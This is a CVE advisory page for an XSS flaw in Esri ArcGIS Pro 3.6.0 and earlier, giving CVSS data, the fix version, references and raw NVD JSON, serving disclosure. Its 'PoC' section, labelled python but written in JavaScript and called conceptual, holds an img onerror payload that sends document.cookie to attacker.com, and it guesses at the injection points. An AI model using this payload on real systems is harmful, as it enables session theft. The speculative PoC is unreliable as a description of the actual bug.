CVE-2026-1446

Description

There is a Cross‑Site Scripting (XSS) issue in Esri ArcGIS Pro versions 3.6.0 and earlier. ArcGIS Pro is a desktop application, and exploitation is limited to local users interacting with the application; no privileged role or elevated permissions are required beyond standard local user access. A local attacker can supply malicious strings that may be rendered and executed when a specific dialog within ArcGIS Pro is opened. This issue is fixed in ArcGIS Pro version 3.6.1.

CVSS Details

CVSS Score

5.0

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:esri:arcgis_pro:*:*:*:*:*:*:*:* - VULNERABLE

Esri ArcGIS Pro <= 3.6.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2026-1446 XSS PoC for Esri ArcGIS Pro 3.6.0
// This PoC demonstrates the XSS vulnerability in ArcGIS Pro dialogs
// Note: This is a conceptual PoC for educational purposes

// Malicious payload that could be injected
var xssPayload = '<script>alert("XSS - CVE-2026-1446")</script>';

// Example attack scenario:
// 1. Attacker with local access crafts malicious string
// 2. The string is stored or passed to ArcGIS Pro
// 3. When victim opens specific dialog (e.g., project properties, metadata editor)
// 4. The XSS payload gets rendered without proper sanitization
// 5. JavaScript code executes in the context of the application

// Simulated injection point (hypothetical)
function exploitArcGISPro(targetInput) {
    // Inject malicious content
    var maliciousString = '<img src=x onerror="fetch(\'http://attacker.com/steal?cookie=\'+document.cookie)">';
    
    // In actual exploitation:
    // - This would be passed through project files, metadata fields, or layer properties
    // - When the dialog renders this content, XSS triggers
    
    console.log('Malicious payload prepared:', maliciousString);
    return maliciousString;
}

// Mitigation check
function checkVersion() {
    var affectedVersion = '3.6.0';
    var fixedVersion = '3.6.1';
    console.log('Affected versions: <=' + affectedVersion);
    console.log('Fixed in version: ' + fixedVersion);
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-1446
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-1446
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-1446/
[4] VulDB https://vuldb.com/cve/CVE-2026-1446
[5] https://www.esri.com/arcgis-blog/products/arcgis-pro/administration/arcgis-pro-3-6-1-patch

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-1446", "sourceIdentifier": "[email protected]", "published": "2026-01-26T18:16:30.140", "lastModified": "2026-02-13T19:41:55.783", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "There is a Cross‑Site Scripting (XSS) issue in Esri ArcGIS Pro versions 3.6.0 and earlier. ArcGIS Pro is a desktop application, and exploitation is limited to local users interacting with the application; no privileged role or elevated permissions are required beyond standard local user access. A local attacker can supply malicious strings that may be rendered and executed when a specific dialog within ArcGIS Pro is opened. This issue is fixed in ArcGIS Pro version 3.6.1."}, {"lang": "es", "value": "Hay un problema de Cross-Site Scripting (XSS) en las versiones 3.6.0 y anteriores de Esri ArcGIS Pro. ArcGIS Pro es una aplicación de escritorio, y la explotación se limita a usuarios locales que interactúan con la aplicación; no se requiere ningún rol privilegiado ni permisos elevados más allá del acceso estándar de usuario local. Un atacante local puede proporcionar cadenas maliciosas que pueden ser renderizadas y ejecutadas cuando se abre un diálogo específico dentro de ArcGIS Pro. Este problema está solucionado en la versión 3.6.1 de ArcGIS Pro."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:esri:arcgis_pro:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.6.1", "matchCriteriaId": "2F0713E0-AF74-4D99-8276-077D18CED526"}]}]}], "references": [{"url": "https://www.esri.com/arcgis-blog/products/arcgis-pro/administration/arcgis-pro-3-6-1-patch", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}